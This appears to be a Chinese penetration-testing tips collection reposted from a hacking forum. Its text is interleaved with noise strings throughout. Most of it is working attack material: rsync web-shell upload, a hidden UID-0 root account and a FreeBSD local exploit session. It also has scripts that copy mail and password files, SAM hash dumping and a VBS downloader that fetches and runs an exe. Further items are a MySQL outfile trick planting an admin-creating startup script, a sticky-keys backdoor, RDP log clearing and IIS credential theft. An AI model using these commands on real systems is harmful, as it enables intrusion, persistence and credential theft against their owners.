supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
) [4 |+ E6 d" H
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
# ?3 A( |6 R8 L( A
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
9 X/ v) c0 r v; q% o
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
( G, d& t! E- `0 u! B
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
( C3 Q8 b2 j! ~1 ~4 O' [9 Y4 O
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
# F$ g J6 s4 C0 Z
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
2 M5 J# F9 D, k+ Z) O# Z
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
. p# S' B H# P0 y9 X& \0 b
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
: |, ^* t4 h9 C
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
' ~) O! {7 T* q4 s1 @. d
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
% w# r5 x! ~8 {: ]" z) J B
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
% Z$ z+ a% v/ }
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
5 k# x. i& x; c, J* `8 S4 U
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
( p: G6 K' b& J0 o* W3 m b/ x* K
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
7 b* v2 n! u0 ]5 e' ~. |
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
2 G; ]& e7 a# d' s* v1 v
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
; l! U% N- R: q& C, f6 v6 j1 z& ?
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
: q& e. ] K% ]. c6 @2 C ]& d0 C
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
( ^9 o1 e) I& O+ t" \ g
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
2 `& u) X# C3 h" p" M9 c( M! ?' X M
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
' \0 G$ @. z; s0 H& @- W' v1 M
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
5 I2 w( g% V7 W( W
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
- L" u' B9 U5 R- [6 v0 I
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
g# U0 G- Q/ W9 p3 d
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
: V+ N, T9 |' p/ A
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
! q2 ^* C+ T1 o# d3 L6 v M7 f
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
8 [2 S5 G8 H0 N5 n1 T; ^1 p
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
7 t" X7 I+ `$ O5 H, M5 B4 B
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
! D% V" M( W8 h3 J* V6 n5 F6 p
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
4 P" h0 y2 I% r N }
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
/ w6 O" v1 B+ b
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
; c4 x- |. t% _, v' p
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
" l5 Q# ^1 c ?3 s3 q
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
$ U. j8 n2 U* H& k8 L: ~
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
3 S( M1 x9 V+ b# s0 B
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
) b# J5 [4 _2 }
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
( X) ?* x. {3 X4 v) D9 D" {1 R
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
) o) \1 v3 h0 [# _/ u* _$ _
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
) Y* k0 `# Z2 s8 O) }. H
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
2 `4 E3 Z9 M. H' x/ N/ }0 \
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
7 \; w% x4 ~5 L, ?7 J8 s
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
% ?' _5 W& x0 Y! X/ }' ]" e
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
* d% z! f X4 T5 R
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
" T- f( @9 I1 w( u2 C3 j( }6 a7 i K
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
& S$ v( C: H' U+ C! b5 B
————————————
5 F2 M' F5 R4 l6 b: A, F
2. NFS渗透技巧
0 {3 A9 H4 m# T/ `0 B8 e
showmount -e ip
7 L# H1 w5 H9 v
列举IP
+ H4 A2 X! ~0 a* J3 \# q7 c
——————
9 y! d8 Q+ S+ o4 r* y* ?/ c
3.rsync渗透技巧
7 d8 m& @4 e4 \8 n* `4 b8 T4 |8 h
1.查看rsync服务器上的列表
! ^! [) [$ r! O+ ~% V
rsync 210.51.X.X::
" u% I# H7 ~! j! v
finance
8 V4 t% ^6 a: n& P& k* n
img_finance
. _ z) e. G/ j i8 e& p
auto
}; i" H8 C- G9 m2 m2 J( D
img_auto
9 Y# \$ q4 U/ Y( L' ^; l
html_cms
/ x3 W% W: U" `+ H: [
img_cms
4 Z; U" C7 p" P' Q) [7 N% z
ent_cms
t0 f6 e' d; s1 S# r
ent_img
, N3 P, U, w% D
ceshi
/ H" g% o( r7 Q
res_img
4 x* u+ {0 R+ o4 M3 W
res_img_c2
/ e/ U7 h3 m% M u" k& ? D% n
chip
7 t; @, D- k7 O0 m: A/ Y
chip_c2
* c9 N6 o0 r; f; o8 m$ j% A
ent_icms
, _% r% i9 O& A( P+ N8 a1 n
games
: D0 @& T1 g% I7 x8 Z0 i
gamesimg
/ J6 Y+ o2 l5 r* H
media
. [: b! C3 y; F8 w" n4 K
mediaimg
G7 t0 a* M5 ?3 [2 x/ H
fashion
$ w$ S3 S3 U9 n- r) d
res-fashion
. `4 n2 y) U) G' U- t/ i% R
res-fo
0 W. p; u/ x4 P- d3 u
taobao-home
5 a9 _" Y3 P2 Z5 `9 f
res-taobao-home
4 A U7 q. f1 u
house
6 W8 G* b$ [* b! u3 `+ a, R0 D
res-house
1 e2 H) I1 t$ ~: M0 m! V1 R, f( w5 B, p$ ?
res-home
8 H8 j: M0 \( K( h. Z y- Q0 k% z& N
res-edu
/ R% d4 g. V7 z5 Q* W- b5 ?
res-ent
- [$ E; o* T5 T/ \+ x
res-labs
4 H W' |) l% L& T
res-news
6 S# p1 |* E- u# ~
res-phtv
3 y7 A& w; ]! C. |3 X
res-media
: k0 P3 y L: R! I1 g* d
home
+ p2 E# V; G. X
edu
% ^" Z$ M# P- e, T; Q- y# a9 x
news
7 j' {7 m2 X( s2 l
res-book
$ Y& I) Z- ]( [1 a
& c- P* ^3 C* s9 |2 a# e0 O, J
看相应的下级目录(注意一定要在目录后面添加上/)
! n0 C& Q5 r- f3 ]1 d6 W- \* s& q
7 v! w; {% k4 k B
! O& l- g- e$ Q9 ~8 C
rsync 210.51.X.X::htdocs_app/
% Z b" @4 D# |8 m8 x
rsync 210.51.X.X::auto/
7 u% J6 P8 A6 e5 m
rsync 210.51.X.X::edu/
: E6 ^5 t, o! U; P
4 ?. r$ }* b/ V& T$ Q
2.下载rsync服务器上的配置文件
& C) \+ E+ V8 `1 S$ \
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
2 |4 P4 N: d( z& Z# n. u! E
% ~, v0 R& {" I: N5 [* W2 I7 i* R; {7 J
3.向上更新rsync文件(成功上传,不会覆盖)
# b9 o. @; [! i# I4 t4 V4 b$ u i
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
, c, K. }$ Q0 {- W6 ~- f+ u
http://app.finance.xxx.com/warn/nothack.txt
* c9 x+ J! h. U) r& ^8 T1 h
& N! u% @7 V* |' O! {6 O
四.squid渗透技巧
/ I' ^) s# X% _2 q
nc -vv baidu.com 80
4 K T5 B" O- N$ c/ ]6 @5 |/ M; P
GET
HTTP://www.sina.com
/ HTTP/1.0
: g5 A4 D$ l9 k5 U
GET
HTTP://WWW.sina.com:22
/ HTTP/1.0
B; f* L' [9 S# b. K
五.SSH端口转发
/ [0 Z2 u- n. F' N3 y' m( S
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
# T4 _2 `! a c0 c. C
$ ^2 q9 y+ s/ z& ]! U( f
六.joomla渗透小技巧
) x# G" k) X3 ]5 V3 t0 _! d
确定版本
$ @8 {" u( e# o5 L3 n5 \3 F: S( n
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-
" s. w) X9 o, c9 ]+ x9 Q6 R
$ y1 ^! i: M& W" K( i9 S/ Y
15&catid=32:languages&Itemid=47
/ O( Z6 R+ \6 H5 q8 T
: t2 v8 \- I& [% l+ w, t7 j
重新设置密码
* t, D' j+ l6 C+ f' F6 e& J, q
index.php?option=com_user&view=reset&layout=confirm
" a" d" e/ r; w9 `3 y4 f
9 n1 m7 n) ~- O; a6 ?; V) t
七: Linux添加UID为0的root用户
1 n4 R# g. ^( Y1 }) i
useradd -o -u 0 nothack
% b6 S2 e" _- ~/ Y" f9 n/ @
+ Q. V$ x8 j" t& y
八.freebsd本地提权
5 G8 Q E& S; V1 t3 ] B. j D
[argp@julius ~]$ uname -rsi
" i* p# n' ?/ b/ Q
* freebsd 7.3-RELEASE GENERIC
, v" U8 _; v( q( k+ w
* [argp@julius ~]$ sysctl vfs.usermount
! e/ }5 r. u5 s
* vfs.usermount: 1
7 y$ ~) V7 a: z" }
* [argp@julius ~]$ id
. j# \6 b! s. j3 ~6 t- [& @
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
' \9 ]9 ~; I% t9 t! q3 c: l6 t
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
% e; \' a( O3 V" o/ y: g* O
* [argp@julius ~]$ ./nfs_mount_ex
4 h7 T5 j! S% d# v3 a% `# j% d
*
! V& W* g8 T5 v' t% |) V0 s
calling nmount()
& q0 k3 E N; @8 X. B% x% q% @
& b! i1 W, T5 v+ |; g ~1 G+ s! U
(注:本文原件由0x童鞋收集整理,感谢0x童鞋,本人补充和优化了点,本文毫无逻辑可言,因为是想到什么就写了,大家见谅)
* o" P- |5 A0 J2 a* ~4 P- L1 h6 j; B
——————————————
. J4 p. ^8 ?" r8 k, }9 F% L, W
感谢T00LS的童鞋们踊跃交流,让我学到许多经验,为了方便其他童鞋浏览,将T00LS的童鞋们补充的贴在下面,同时我也会以后将自己的一些想法跟新在后面。
$ [5 c# b7 j0 H- g. x4 u$ c+ }
————————————————————————————
_3 @8 F4 J) ^# u
1、tar打包 tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*
% B/ M6 O. w7 b7 d2 h
alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
7 D" e" U1 n& O9 W" P: @
{
& e( W" K2 ]- t) {% E# _8 V. R
注:
6 ^7 K! o+ H, F8 x- p
关于tar的打包方式,linux不以扩展名来决定文件类型。
8 c4 l+ }1 W' N
若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压
, E- A0 P' k1 A; L0 E1 h
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*
% Q2 H$ u& p8 ~( P, u! x* p# i
}
8 [) q( S7 {% W! @" G3 m
6 ?, [ h/ P( o. M |( ~( c3 |% c
提权先执行systeminfo
5 _9 O3 v5 a! r
token 漏洞补丁号 KB956572
4 Y+ o/ |' r; u' O* ]) Y6 F9 P) ?
Churrasco kb952004
' @# B9 T5 k2 V8 i3 g$ g
命令行RAR打包~~·
: E5 q5 G6 G! q- ^1 i% e
rar a -k -r -s -m3 c:\1.rar c:\folder
/ V6 W5 [ M, N8 T& I9 C
——————————————
1 A2 N# H9 H. ~+ _4 D
2、收集系统信息的脚本
" o% Y8 F% ~/ G& e F
for window:
, d4 N3 D" R! V- Z
- A9 u# q1 t3 V9 I$ e' ~. E
@echo off
, }4 Z2 m0 s' i- }$ F
echo #########system info collection
. p/ h6 b. W7 A2 c- Y0 I
systeminfo
" t; h- P& a+ s+ V) J3 ^. M. d3 ^
ver
7 U8 ?9 ~6 K; c" | Y0 M
hostname
3 d0 {. Q8 h. W& ]
net user
3 H4 |1 ~! D2 Y9 l5 z6 m
net localgroup
0 y3 h6 J; ]+ b* H! A1 D
net localgroup administrators
; L0 @- }! B& k) q V$ b
net user guest
/ ~6 b9 d3 C8 `, Y, P( O
net user administrator
0 S8 p. i# B, m$ G+ I
0 u0 M- D/ ]/ } d8 i! @7 V
echo #######at- with atq#####
1 }" y3 F$ u2 E# p; ]9 i
echo schtask /query
& {% R) y9 s% [& @1 U2 O9 G
2 F' p. k1 r5 w& e L/ n5 K
echo
3 [! r0 k, X; ?% F3 C% ~
echo ####task-list#############
6 R7 h( s" ?, w
tasklist /svc
* [! c9 w, x6 V& o i Y; j K& E
echo
) D6 X: j3 @: |; X1 U
echo ####net-work infomation
/ O- |" y8 M: v5 Z7 c2 a
ipconfig/all
: U$ T' e6 c% Y# t* i* h- P" P
route print
5 ]- x, y! D) B: `0 [ w
arp -a
* O) b2 V! W: ^& G9 T# S% D, C
netstat -anipconfig /displaydns
/ M3 D3 n% y: D
echo
7 X" J" {' K8 q+ W
echo #######service############
9 c1 t; C1 x3 _3 U- y, v' c
sc query type= service state= all
* x1 C8 v$ K/ a) e
echo #######file-##############
1 R. t& x7 X5 I/ L) x) E
cd \
& X( |/ \: Y- `0 n/ }; H
tree -F
8 L1 v" E/ _& ?9 t* Q& N4 \. Y% c
for linux:
: u, n& R T) E+ q! e5 Y R
" n/ [9 o+ i* f- q. G6 s
#!/bin/bash
$ p% i# O% p9 M! a
% f8 C7 k7 j6 [& d0 L3 S
echo #######geting sysinfo####
; W* s1 S; @4 ]9 u2 c
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
: w7 U" p' e+ h+ Z$ y* z" y
echo #######basic infomation##
- ]4 l M, C' l: I& ]' V
cat /proc/meminfo
`0 |/ T/ j& o
echo
4 R- f. M. }8 }/ V! R1 F8 ^% R
cat /proc/cpuinfo
! N& N9 s0 M' b. t
echo
$ I8 f: e/ V# H' R5 \" U8 @: V
rpm -qa 2>/dev/null
' c0 {1 p, o0 o! T1 P/ u
######stole the mail......######
+ {2 v; W& i2 J" p5 b( `4 g
cp -a /var/mail /tmp/getmail 2>/dev/null
! y$ o# _+ z& ~& i$ h7 [
& {7 e2 E% E2 k: g& i( Y! o
/ L! Z, e/ w9 c- u% ^
echo 'u'r id is' `id`
! b* o6 Q/ ^/ z+ c6 [' L
echo ###atq&crontab#####
o" `( x8 M) }
atq
/ s2 C$ d9 Q0 k: a, d4 s, A
crontab -l
, G& T. I7 d$ q1 U- \' V9 l6 D$ W
echo #####about var#####
' t. W2 P$ a6 B
set
% E% U5 P' V* ~% h6 p
. t% V* C$ C a- p. c) J
echo #####about network###
$ u C9 ~- Q5 P+ w; u. h
####this is then point in pentest,but i am a new bird,so u need to add some in it
8 ?& r& X7 u) y& ?" l' G
cat /etc/hosts
' C9 a, q/ z# {: ^, Y
hostname
& P5 f8 X8 i. d8 K) F4 I
ipconfig -a
+ w4 j- |- E2 Y8 m. x% b
arp -v
+ Z* S: O: l) M. R b- g
echo ########user####
+ B. z/ }4 t& ^# G6 G- ?/ v5 a
cat /etc/passwd|grep -i sh
k- j& e0 `$ j# i7 @6 K
f% w* R/ m! L' x: q+ b* @
echo ######service####
: T1 }0 z0 I( O7 V6 U. ?$ W
chkconfig --list
! o( H$ n( ^& j$ d% [8 ?$ T
: Q z! k9 {1 E7 q# U+ |8 B
for i in {oracle,mysql,tomcat,samba,apache,ftp}
9 H. N- @* k0 @9 U' c% e* v8 k% D
cat /etc/passwd|grep -i $i
3 m4 S! Z6 p9 A/ q$ [) Q7 S
done
/ a5 v4 l1 j5 K+ y' I
. r7 [0 P2 t6 M
locate passwd >/tmp/password 2>/dev/null
' C7 {, r+ o# L" t) R" J+ }
sleep 5
! d5 u# n2 A9 G* q
locate password >>/tmp/password 2>/dev/null
1 J: Z0 C' I9 u9 |0 o8 Y
sleep 5
' A, `* @1 |, p: S3 O
locate conf >/tmp/sysconfig 2>dev/null
9 G# B7 t U0 ^3 L
sleep 5
: y! F& l- a2 h" B5 r2 i
locate config >>/tmp/sysconfig 2>/dev/null
& ? V2 B( _0 |) f
sleep 5
; m2 ^# I5 i% \$ U& L
: h& Q0 v: }4 n) V- |$ g8 N6 q! @8 m
###maybe can use "tree /"###
; l+ s( y6 M3 g g
echo ##packing up#########
! z& h% e7 q! c$ [3 e8 S" y
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
( w8 T1 C5 H) [2 t/ @
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
! x+ V; M. b \; V5 Z. L4 q
——————————————
+ z, I- A# _/ ]* C
3、ethash 不免杀怎么获取本机hash。
% F# ^5 {! \4 {1 o; Q
首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" (2000)
! [% [) K8 N" ~: G- W h
reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg (2003)
, F" W3 _! }7 r ^) T0 h# H% ~
注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)
8 r/ T, R2 m. F+ t5 F
接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了
) s0 v# r0 {9 N9 t7 N
hash 抓完了记得把自己的账户密码改过来哦!
( f* ~) H" P/ g; D
据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~
; }9 U: Z6 G4 J( o5 y3 c
——————————————
% t2 [6 V! C! B
4、vbs 下载者
! ^, b* l+ k% ]
1
Q G0 T3 U9 B0 p: F
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
% E+ k: r2 L$ y$ ^9 \8 e
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
; r8 i! l/ l& g. g* `8 n
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
8 p7 K9 ?. T& k0 s. D% Y5 h
echo sGet.Open() >>c:\windows\cftmon.vbs
+ l; A6 D+ J6 K+ J6 d: D( M* f$ D
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
! M0 B& O2 C' F
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
! a4 I* |1 t g" z
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
6 f. s. F3 P2 x4 \
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
6 H' b' N6 l9 N# |2 n
cftmon.vbs
7 W% G$ ^- D8 K. K' |
# U, F2 V4 D2 s2 [! W3 D
2
/ H6 y$ N* R6 o% ~8 C
On Error Resume Next
im iRemote,iLocal,s1,s2
" u; c- J( N' Y( {
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
3 p# w5 A4 A7 W; I
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
0 `1 y- ^: O3 b; l6 t7 e
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
5 V3 O2 n3 L, ^/ L5 W( z3 z
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
; ]8 P9 T* e; [2 x; e' F* l9 x
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
! G- l' u% {$ n+ ?
2 l* Q* q! G* s! _! T. j3 Y
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
/ K& P' E! D5 x$ p+ i( V# C
- N5 ]" w* Y3 b8 ]$ ~; [
当GetHashes获取不到hash时,可以用兵刃把sam复制到桌面
6 j% W4 Q0 \6 h$ n9 j
——————————————————
! E' {7 ~; ^! S; g( S) ~$ R& u
5、
9 |8 C( W. R4 Q/ M
1.查询终端端口
$ i9 U) K' o d9 u3 e
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
6 r! \4 s2 k6 L8 B
2.开启XP&2003终端服务
$ r: R' @7 I& H* a/ X9 N- p# O* b
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- U( ~: T, h" f# f- S- X2 r
3.更改终端端口为2008(0x7d8)
4 b* R# n7 Z: l0 L& o- G' o
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
) A5 X. q- `8 c# m
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
8 f$ r9 q8 v2 m& \, t
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
6 B F# ~% p& G; [% j6 ?( K6 C2 A1 s
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled
xpsp2res.dll,-22009 /f
" [4 Y- t" A4 e- `6 R: k1 F4 W7 K
————————————————
6 j+ U7 S ]3 \, ]% F" z
6、create table a (cmd text);
+ X5 G/ k( W* I- f7 A% }
insert into a values ("set wshshell=createobject (""wscript.shell"")");
5 i& [# e2 E- {3 V
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
6 c( L4 O+ |5 t4 H- _' C, A# d
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
( w4 S; f& c" c9 I
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
) W; y# c/ L# `* ]: f
————————————————————
; n! }# ]; E. J0 s
7、BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。(注:一直忽略了在偏僻角落的那个功能)
' Z0 _* V' u2 C+ [- g% O! E
_____
' [. f( u6 G- a2 J- ~4 L
8、for /d %i in (d:\freehost\*) do @echo %i
( C+ H/ Z& \+ `' D2 g! h9 Z
" o1 P' \# O. o5 h( e8 p
列出d的所有目录
9 U. @3 m% {7 e; G) D I
9 D" i3 ~. u; A- }
for /d %i in (???) do @echo %i
% @1 X, D! e$ u0 A, `! \7 b5 E
" g9 B7 O# V4 U [; O! M
把当前路径下文件夹的名字只有1-3个字母的打出来
+ [5 r8 i0 D/ R( L& n5 e
% ^5 l: \8 v6 f5 r
2.for /r %i in (*.exe) do @echo %i
|! |; ~- E, j0 ^, j: i. f
! h+ ~& K% c/ E+ h, d" b
以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出
9 f; K4 e& H1 Q- w# C9 r" x
6 ~4 j [5 V/ X+ L& L! |
for /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i
) k6 c' m9 O; V& O" e4 c6 `
' _) z1 J+ J: t g: A
3.for /f %i in (c:\1.txt) do echo %i
7 w1 z2 h6 u, S# K* v& y) G! U1 y
6 _' s4 ~4 i* C& ^9 t7 m% n4 J
//这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中
! j' E; W2 y! S: s5 p8 Z3 A
6 M* B d, H" i* y/ u' L
4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i
" B, A; j# E1 o! {
: {' d& i+ J/ b. S. V% A1 {1 k
delims=后的空格是分隔符 tokens是取第几个位置
' Y1 B( u: d/ I; X: u
——————————
$ ]/ d" X+ B! _7 Z0 T: G& S
●注册表:
2 I" u+ k9 ?" W
1.Administrator注册表备份:
3 Y9 P' z7 P' r
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg
% a% @1 S* Q, }& o
8 ]2 }* C* S% }, O' W9 k+ p
2.修改3389的默认端口:
7 i9 ]3 i* _! M; A: q: K
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
2 c3 r6 @( Y* v+ _1 R3 O$ A: e
修改PortNumber.
3 D- R% h: p: ?. @
/ }# }8 G5 F0 @) e
3.清除3389登录记录:
4 m/ j+ F/ x6 i6 F/ j! F
reg delete "HKCU\Software\Microsoft\Terminal Server Client" /f
* P- R5 d3 ?' {& V7 D2 X! ^ h7 a
, W/ _% _' F0 S
4.Radmin密码:
) _" a* m5 O* i) ^+ G% O7 H
reg export HKLM\SYSTEM\RAdmin c:\a.reg
8 X3 }6 r- ^7 j- H4 Q# C% Q: O
" o/ Y+ R1 w5 N+ W1 f) f$ ~0 d
5.禁用TCP/IP端口筛选(需重启):
# t/ x+ T: N/ D3 g0 C" ~# i* U* p
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
/ }9 \+ t/ _+ g0 V+ A. F
! ?% {* }) d) O3 _: t! U* Z6 j
6.IPSec默认免除项88端口(需重启):
% A& T) J8 r( b. w$ {* d: [
reg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
6 v& E" }# k. f: k& \, w9 J* c
或者
8 {( P4 I6 O4 S: k, {
netsh ipsec dynamic set config ipsecexempt value=0
, x" \/ @1 o/ \* w! Q- _
F9 |+ F" Z5 x2 s/ ]6 F0 u
7.停止指派策略"myipsec":
2 \- m) s# t& a5 k$ ?4 {2 G- ?
netsh ipsec static set policy name="myipsec" assign=n
& O/ O$ [4 b4 ]1 ?- p) g
2 Q, ^1 i3 a# F( W4 D9 |1 Q
8.系统口令恢复LM加密:
* v- \" J* r$ Z+ M# W" ~
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f
' z+ i, m! J& f6 V- u$ z
; ~# f$ T* h9 F4 l
9.另类方法抓系统密码HASH
$ S+ r# z. R/ m! o4 b; }' C
reg save hklm\sam c:\sam.hive
0 y, k+ q& I# b3 X
reg save hklm\system c:\system.hive
. K. x7 y' L" W+ g T! U
reg save hklm\security c:\security.hive
2 S* I+ m0 H, [: w5 M ~
# V" [* `, x8 J& }. p2 Z
10.shift映像劫持
, Z0 n( c" n, s- V( O9 ~
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe
1 y7 A1 s, i; P% w
* @, r( Q- Z4 _# i& j
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
' ~& o, l7 ]! b+ r
-----------------------------------
+ c7 l( v4 l- E! a i1 g
星外vbs(注:测试通过,好东西)
5 D9 q3 c1 @, j' l1 R
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
% q* ^& O# X P
For Each obj3w In objservice
1 c( v' G+ U- x) L/ d3 `
childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
$ l% T7 [2 u3 Q6 Z, [
if IsNumeric(childObjectName)=true then
. r1 U. j+ I4 x: y9 i& [9 P% d
set IIs=objservice.GetObject("IIsWebServer",childObjectName)
4 k4 j+ @' }* O/ I }
if err.number<>0 then
2 w: i/ o7 |* Z2 r1 H
exit for
5 A7 s% |# m2 k3 ^8 h2 t
msgbox("error!")
! a% J9 C- s9 B7 D6 v
wscript.quit
4 }. Q2 c- ~, v+ M0 e5 t# H
end if
8 Z5 n* J3 r+ _+ {' @: U0 ~' H
serverbindings=IIS.serverBindings
& c3 @4 H( ~- m1 q4 |& V
ServerComment=iis.servercomment
* ~/ L# u, V" R# {" D6 u
set IISweb=iis.getobject("IIsWebVirtualDir","Root")
5 {4 M; N+ X* o0 h0 U& {
user=iisweb.AnonymousUserName
! B( t$ ]6 L& S2 t+ I# Y
pass=iisweb.AnonymousUserPass
$ c) _% r L( ]" e+ s# H, c; h- V
path=IIsWeb.path
" d/ D1 U9 Z1 m( }) d% ^; z/ U
list=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
. @; W" e& z8 g o: v- u0 i0 w1 g
end if
6 M8 w; b6 u) ~5 \; g. r4 R
Next
8 ~8 ]7 n; c* O9 V! Z" L! p, V: b
wscript.echo list
- n: e2 T- v) L! f, F
Set ObjService=Nothing
" }, Q0 k0 c* M: x' E, k2 Y; p3 N
wscript.echo "from :
http://www.xxx.com/
" &vbTab&vbCrLf
